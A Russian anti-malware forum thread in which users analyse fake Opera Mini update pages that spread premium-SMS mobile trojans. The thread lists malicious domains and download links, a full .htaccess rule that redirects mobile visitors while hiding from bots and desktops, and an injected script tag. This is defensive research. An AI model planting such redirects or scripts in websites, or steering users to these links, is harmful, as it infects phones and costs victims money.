Перейти к содержанию

Recommended Posts

priv8v
976a6b733169.jpg


Тем, кому приходиться путешествовать по просторам интернета с мобильного гаджета с помощью Opera Mini, тому наверняка знакома эта удручающая картина - хочешь зайти на сайт, а тебе пытаются впарить новую оперу...

Если скачивать, то есть всего два варианта развития событий:

1. По ссылке будет лежать зловред (для телефона, разумеется), который будет прожорлив до отправки платных смс
2. Будет лежать Опера, но в обертке опять таки трояна с тем же функционалом, что и в первом пункте (может даже с ЛС, в котором цены будут указаны)

Хочется отметить, что данные сайты являются зараженными на достаточно глубоком уровне (не ифреймом), зловредный файл лежит прямо среди других файлов сайта...

Ниже будут приведены адреса некоторых сайтов, краткое описание что и почему происходит и (чтобы не быть голословным) ссылки на ВТ на анализ файлов.

На _vsofte.ru_ и перенаправляемся на _http://opera-new6.ru/?id=724, скачиваем оттуда OperaUpdate.jar
Зараженный файл на сайте:
_http://vsofte.ru//templates/WebTPL/js/jquery-1.4.2.min.js

На _flashki.ru (по запросу "игры" в гугле на втором месте сайт, кстати) редиректит на _http://opera-new6.ru/?id=678
а если на _opera-new6.ru/download/?id=678 заходить с обычным юзерагентом, то выцепляется просто имя ОСи (винды) и качается setup.CAB с 46.161.31.167
Все благодаря _http://flashki.ru//shared/js/jquery/simplemodal/jquery.simplemodal.js

А вот и под андроид:
http://mobile-premium-v10.com/jar/Opera_Mini_NEW_04548.jar слив идет, с хтаксесом помудрено видимо там...)

Еще на взломанных сайтах встречаются редиректы на:
_http://updateyouropera.ru_http://mobile-premium-v9.com_http://dl1.mobile-download.ru/midlet/d1Gnhe/m1/mt73/a10_5_3/nOpera Mini/s79203/sm1/Opera_Mini.jar




Таких хакнутых сайтов достаточно много...

  • Upvote 10

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
lobzik

Похоже эти сайты одна из причин, почему DrWeb для Андроид так высоко взлетел в топе маркета. Похоже он единственный кто может дать адекватный отпор.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
priv8v

все находил и анализировал сам, новости от ТМ не видел, думал что я первый буду (

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
priv8v

сейчас пришло в голову, что я ступанул с механизмом заражения сайтов, поторопился все поздним вечером за раз сделать...

склоняюсь к заражению пхп кода файлов, возможно, что путей/механизмов заражения сайта несколько...

в общем вопрос пока открытым остается...

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
A.

С чего ты вообще решил, что это "зараженные" сайты ?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
priv8v

хм, ну ведь я же постом выше написал, что этот вопрос оставляю открытым про пути и механизмы заражения, т.к у меня тут по всем пунктам сомнения...

В любом случае заражены, вопрос в том где админ, а где хакеры постарались, и в том КАК именно заражены (что за файлы, когда, зачем(типа где и что за партнерка это и сколько их))...

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Umnik
На _vsofte.ru_ и перенаправляемся на _http://opera-new6.ru/?id=724, скачиваем оттуда OperaUpdate.jar

Качает под ОС. С Андроида качает apk, как положено. Детект KMS:

screenshot_1317886734256.png

post-3736-1317887041_thumb.png

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Mr. Justice
все находил и анализировал сам, новости от ТМ не видел, думал что я первый буду (

В любом случае огромное спасибо за интересное исследование. Вы уже давно должны ИМХО быть в Экспертном совете АМ.

Похоже эти сайты одна из причин, почему DrWeb для Андроид так высоко взлетел в топе маркета. Похоже он единственный кто может дать адекватный отпор.

Единственный? Пройдите по ссылке, которую я привел выше. Скажите когда DrWeb стал детектировать этого зловреда?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
priv8v

Umnik, спасибо, я как раз хотел попросить попроверять с разных осей, у самого сейчас руки не доходят все варианты перебрать...

подделайтесь под симбиан, вдруг еще сис выдаст)))

ps: пишу с оперы мини (не фальшивой:))

ps2: что кто может сказать более четко про масштабы и пути заражения?

просто в ближайшие дни я не буду за своим компом скорее всего...

в идеале еще надо паучка на пыхе написать который прочекаекает топ-20 по популярным запросам в поисковик..

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
priv8v

а вот ягодка:

что у нас в топе поиска яндекса что могли бы скорее всего и с мобилы вводить? "одноклассники". Второй и третий сайт редиректят!

.lemoby.ru/?r=24

.rmoby.ru/?l=5&r=3842

Вот где собака-то серьезная зарылась! На моей памяти еще не было такой оккупации зловредами интернета, чтобы в немеренных количествах в топе практически всех популярных поисковых запросов ((

Каспер/др.веб детектит эти файлы?

ps: эпидемия - просто не то слово...(

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
A.
а вот ягодка:

что у нас в топе поиска яндекса что могли бы скорее всего и с мобилы вводить? "одноклассники". Второй и третий сайт редиректят!

.lemoby.ru/?r=24

.rmoby.ru/?l=5&r=3842

Ну вот сам же посмотри http://lemoby.ru/

Это все не взломанные сайты, а специально созданные.

То что Яндекс так и не научился должным образом чистить выдачу, несмотря на все свои потуги - печально, да.

Но тем хуже ему.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
priv8v
Это все не взломанные сайты, а специально созданные.

A.

в самой поисковой выдаче сайты были вроде terr.ru и students.ru, а уже с НИХ были редиректы на вышеприведенные сайты. То ли я как-то криво пишу, то ли меня как-то криво понимают...

Opera/9.80 (Windows Mobile; Opera Mini/5.1.21594/26.950; U; ru) Presto/2.8.119 Version/10.54

Кстати, поисковая выдача отличается при разных юзерагентах! Учитывайте это!

PS: может я и перегибаю планку с всерунетовской эпидемией что аж всем хана, но масштабы правда достаточно велики )))

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
priv8v

Содержание хтаксесс на сайте, где вебмастер козел:

RewriteEngine on RewriteCond %{HTTP_USER_AGENT} acs [NC,OR] RewriteCond %{HTTP_USER_AGENT} alav [NC,OR] RewriteCond %{HTTP_USER_AGENT} alca [NC,OR] RewriteCond %{HTTP_USER_AGENT} amoi [NC,OR] RewriteCond %{HTTP_USER_AGENT} audi [NC,OR] RewriteCond %{HTTP_USER_AGENT} aste [NC,OR] RewriteCond %{HTTP_USER_AGENT} avan [NC,OR] RewriteCond %{HTTP_USER_AGENT} benq [NC,OR] RewriteCond %{HTTP_USER_AGENT} bird [NC,OR] RewriteCond %{HTTP_USER_AGENT} blac [NC,OR] RewriteCond %{HTTP_USER_AGENT} blaz [NC,OR] RewriteCond %{HTTP_USER_AGENT} brew [NC,OR] RewriteCond %{HTTP_USER_AGENT} cell [NC,OR] RewriteCond %{HTTP_USER_AGENT} cldc [NC,OR] RewriteCond %{HTTP_USER_AGENT} cmd- [NC,OR] RewriteCond %{HTTP_USER_AGENT} dang [NC,OR] RewriteCond %{HTTP_USER_AGENT} doco [NC,OR] RewriteCond %{HTTP_USER_AGENT} eric [NC,OR] RewriteCond %{HTTP_USER_AGENT} hipt [NC,OR] RewriteCond %{HTTP_USER_AGENT} inno [NC,OR] RewriteCond %{HTTP_USER_AGENT} ipaq [NC,OR] RewriteCond %{HTTP_USER_AGENT} java [NC,OR] RewriteCond %{HTTP_USER_AGENT} jigs [NC,OR] RewriteCond %{HTTP_USER_AGENT} kddi [NC,OR] RewriteCond %{HTTP_USER_AGENT} keji [NC,OR] RewriteCond %{HTTP_USER_AGENT} leno [NC,OR] RewriteCond %{HTTP_USER_AGENT} lg-c [NC,OR] RewriteCond %{HTTP_USER_AGENT} lg-d [NC,OR] RewriteCond %{HTTP_USER_AGENT} lg-g [NC,OR] RewriteCond %{HTTP_USER_AGENT} lge- [NC,OR] RewriteCond %{HTTP_USER_AGENT} maui [NC,OR] RewriteCond %{HTTP_USER_AGENT} maxo [NC,OR] RewriteCond %{HTTP_USER_AGENT} midp [NC,OR] RewriteCond %{HTTP_USER_AGENT} mits [NC,OR] RewriteCond %{HTTP_USER_AGENT} mmef [NC,OR] RewriteCond %{HTTP_USER_AGENT} mobi [NC,OR] RewriteCond %{HTTP_USER_AGENT} mot- [NC,OR] RewriteCond %{HTTP_USER_AGENT} Android [NC,OR] RewriteCond %{HTTP_USER_AGENT} android [NC,OR] RewriteCond %{HTTP_USER_AGENT} moto [NC,OR] RewriteCond %{HTTP_USER_AGENT} mwbp [NC,OR] RewriteCond %{HTTP_USER_AGENT} nec- [NC,OR] RewriteCond %{HTTP_USER_AGENT} newt [NC,OR] RewriteCond %{HTTP_USER_AGENT} noki [NC,OR] RewriteCond %{HTTP_USER_AGENT} opwv [NC,OR] RewriteCond %{HTTP_USER_AGENT} palm [NC,OR] RewriteCond %{HTTP_USER_AGENT} pana [NC,OR] RewriteCond %{HTTP_USER_AGENT} pant [NC,OR] RewriteCond %{HTTP_USER_AGENT} pdxg [NC,OR] RewriteCond %{HTTP_USER_AGENT} phil [NC,OR] RewriteCond %{HTTP_USER_AGENT} play [NC,OR] RewriteCond %{HTTP_USER_AGENT} pluc [NC,OR] RewriteCond %{HTTP_USER_AGENT} port [NC,OR] RewriteCond %{HTTP_USER_AGENT} prox [NC,OR] RewriteCond %{HTTP_USER_AGENT} qtek [NC,OR] RewriteCond %{HTTP_USER_AGENT} qwap [NC,OR] RewriteCond %{HTTP_USER_AGENT} sage [NC,OR] RewriteCond %{HTTP_USER_AGENT} sams [NC,OR] RewriteCond %{HTTP_USER_AGENT} sany [NC,OR] RewriteCond %{HTTP_USER_AGENT} sch- [NC,OR] RewriteCond %{HTTP_USER_AGENT} sec- [NC,OR] RewriteCond %{HTTP_USER_AGENT} send [NC,OR] RewriteCond %{HTTP_USER_AGENT} seri [NC,OR] RewriteCond %{HTTP_USER_AGENT} sgh- [NC,OR] RewriteCond %{HTTP_USER_AGENT} shar [NC,OR] RewriteCond %{HTTP_USER_AGENT} sie- [NC,OR] RewriteCond %{HTTP_USER_AGENT} siem [NC,OR] RewriteCond %{HTTP_USER_AGENT} smal [NC,OR] RewriteCond %{HTTP_USER_AGENT} smar [NC,OR] RewriteCond %{HTTP_USER_AGENT} sony [NC,OR] RewriteCond %{HTTP_USER_AGENT} sph- [NC,OR] RewriteCond %{HTTP_USER_AGENT} symb [NC,OR] RewriteCond %{HTTP_USER_AGENT} t-mo [NC,OR] RewriteCond %{HTTP_USER_AGENT} teli [NC,OR] RewriteCond %{HTTP_USER_AGENT} tim- [NC,OR] RewriteCond %{HTTP_USER_AGENT} tosh [NC,OR] RewriteCond %{HTTP_USER_AGENT} tsm- [NC,OR] RewriteCond %{HTTP_USER_AGENT} upg1 [NC,OR] RewriteCond %{HTTP_USER_AGENT} upsi [NC,OR] RewriteCond %{HTTP_USER_AGENT} vk-v [NC,OR] RewriteCond %{HTTP_USER_AGENT} voda [NC,OR] RewriteCond %{HTTP_USER_AGENT} w3cs [NC,OR] RewriteCond %{HTTP_USER_AGENT} wap- [NC,OR] RewriteCond %{HTTP_USER_AGENT} wapa [NC,OR] RewriteCond %{HTTP_USER_AGENT} wapi [NC,OR] RewriteCond %{HTTP_USER_AGENT} wapp [NC,OR] RewriteCond %{HTTP_USER_AGENT} wapr [NC,OR] RewriteCond %{HTTP_USER_AGENT} webc [NC,OR] RewriteCond %{HTTP_USER_AGENT} winw [NC,OR] RewriteCond %{HTTP_USER_AGENT} winw [NC,OR] RewriteCond %{HTTP_USER_AGENT} xda [NC,OR] RewriteCond %{HTTP_USER_AGENT} xda- [NC,OR] RewriteCond %{HTTP_USER_AGENT} up.browser [NC,OR] RewriteCond %{HTTP_USER_AGENT} up.link [NC,OR] RewriteCond %{HTTP_USER_AGENT} windows.ce [NC,OR] RewriteCond %{HTTP_USER_AGENT} iemobile [NC,OR] RewriteCond %{HTTP_USER_AGENT} mini [NC,OR] RewriteCond %{HTTP_USER_AGENT} mmp [NC,OR] RewriteCond %{HTTP_USER_AGENT} symbian [NC,OR] RewriteCond %{HTTP_USER_AGENT} midp [NC,OR] RewriteCond %{HTTP_USER_AGENT} wap [NC,OR] RewriteCond %{HTTP_USER_AGENT} phone [NC,OR] RewriteCond %{HTTP_USER_AGENT} pocket [NC,OR] RewriteCond %{HTTP_USER_AGENT} mobile [NC,OR] RewriteCond %{HTTP_USER_AGENT} pda [NC,OR] RewriteCond %{HTTP_USER_AGENT} PPC [NC,OR] RewriteCond %{HTTP_USER_AGENT} Series60 [NC,OR] RewriteCond %{HTTP_USER_AGENT} Opera.Mini [NC] RewriteCond %{HTTP_USER_AGENT} !windows.nt [NC] RewriteCond %{HTTP_USER_AGENT} !bsd [NC] RewriteCond %{HTTP_USER_AGENT} !x11 [NC] RewriteCond %{HTTP_USER_AGENT} !unix [NC] RewriteCond %{HTTP_USER_AGENT} !macos [NC] RewriteCond %{HTTP_USER_AGENT} !macintosh [NC] RewriteCond %{HTTP_USER_AGENT} !tion [NC] RewriteCond %{HTTP_USER_AGENT} !google [NC] RewriteCond %{HTTP_USER_AGENT} !yandex [NC] RewriteCond %{HTTP_USER_AGENT} !bot [NC] RewriteCond %{HTTP_USER_AGENT} !libwww [NC] RewriteCond %{HTTP_USER_AGENT} !msn [NC] RewriteCond %{HTTP_USER_AGENT} !america [NC] RewriteCond %{HTTP_USER_AGENT} !avant [NC] RewriteCond %{HTTP_USER_AGENT} !download [NC] RewriteCond %{HTTP_USER_AGENT} !fdm [NC] RewriteCond %{HTTP_USER_AGENT} !maui [NC] RewriteCond %{HTTP_USER_AGENT} !webmoney [NC] RewriteCond %{HTTP_USER_AGENT} !windows-media-player [NC] RewriteRule ^(.*)$ http://opera-new6.ru/?id=ТУТ_ID [L,R=302]

А если через яваскрипт, то так будет:

<script type='text/javascript' src='http://opera-new6.ru/js/?link=http%3A%2F%2Fopera-new6.ru%2F%3Fid%ТУТ_ID'></script>

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
lobzik
Единственный? Пройдите по ссылке, которую я привел выше. Скажите когда DrWeb стал детектировать этого зловреда?

Без понятия когда, но если почитать отзывы в Маркете у DrWeb Light, то народ пишет про найденные фейковые Оперы намного раньше. чем 29 сентября :lol:

А насчет единственного, какие еще есть альтернативы? Покупать каспера за 300 руб?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
priv8v
Без понятия когда, но если почитать отзывы в Маркете у DrWeb Light, то народ пишет про найденные фейковые Оперы намного раньше. чем 29 сентября

ну да, давно встречаются, просто сейчас наболело и решил написать...

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
priv8v

Нарыл около сотни зловредных доменов (не сайтов, где админы трафф сливают, а конечные - т.е те, КУДА льют, откуда качают). Что с ними делать?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Mr. Justice
Без понятия когда, но если почитать отзывы в Маркете у DrWeb Light, то народ пишет про найденные фейковые Оперы намного раньше. чем 29 сентября :lol:

Означает ли это что кроме DrWeb ранее 29 сентября никто не детектировал зловреда? Если не означает, то откуда такая уверенность в том, что DrWeb единственый?

А насчет единственного, какие еще есть альтернативы? Покупать каспера за 300 руб?

Причем тут покупка? Не уводите обсуждение в сторону. Речь идет о суперэксклюзиве от DrWeb. Итак, если вы настаиваете, что DrWeb единственный, то прошу более основательно аргументировать свою позицию, если других аргументов нет, то может не стоило писать в таком категоричном тоне о превосходстве DrWeb?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
alexgr

кстати, сегодня лечил подобное. Оказался Android.smssender.86

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
priv8v

в чем заключается лечение? в андроиде ни бум-бум. в моем представлении это через установку и удаление программ делается (ее аналог в андроиде)...

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
priv8v

каким способом? зашли туда с виртуалки с пятого IE?))

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
goover

Firefox-ом, отключив AdBlock и NoScript (и плагины, конечно)

scr1.jpg

post-5047-1317922701_thumb.jpg

  • Upvote 5

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
alexgr
в чем заключается лечение? в андроиде ни бум-бум. в моем представлении это через установку и удаление программ делается (ее аналог в андроиде)...

да не совсем... появление предупреждения у человека про старую версию Оперы воспринял верно. Заблочил СМС сервис, вынес саму псевдо - оперу, а потом искал - что еще воткнулось в последнее время. Нашел.... Потом отловленное проверил на рабочем компе Авастом - вердикт подтвердился

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

  • Сообщения

    • Ego Dekker
    • ArktiTig
      Арктика - северная полярная область Земли, включающая окраины материков Евразии и Северной Америки, почти весь Северный Ледовитый океан с островами и прилегающие к нему части Атлантического и Тихого океанов. Название её происходит от греческого слова arctos (медведь) и связано со звёздами: Полярная звезда, находящаяся почти точно в зените над Северным полюсом, принадлежит к созвездию Малая Медведица.
    • ArktiTig
      Арктика - северная полярная область Земли, включающая окраины материков Евразии и Северной Америки, почти весь Северный Ледовитый океан с островами и прилегающие к нему части Атлантического и Тихого океанов. Название её происходит от греческого слова arctos (медведь) и связано со звёздами: Полярная звезда, находящаяся почти точно в зените над Северным полюсом, принадлежит к созвездию Малая Медведица.
    • PR55.RP55
      .xml  файлы taskschd.msc Могут быть подписаны  цифровой подписью. Думаю будет нелишним, если uVS будет это фиксировать. т.е. проверять не только подпись целевого файла, но и подпись самого файла\задачи. и писать в ИНфО .  
    • demkd
      ---------------------------------------------------------
       4.15.2
      ---------------------------------------------------------
       o Исправлена ошибка при работе с образом автозапуска.
         Для некоторых процессов команда unload не добавлялась в скрипт при нажатии кнопки "принять изменения".  o Добавлена плашка окна на таскбаре для окна удаленного рабочего стола.
         (при работе с удаленной системой) -----------------------------------------------------------
      Есть проблема с локализацией глюка в редких случаях приводящему к аварийному завершению uVS при активном флаге "Проверять весь HKCR".
      На основе дампов его найти не получается, нужна копия реестра системы с такой проблемой, если кому-то попадется такая проблема, то присылайте архив с копией реестра системы мне на почту.  
×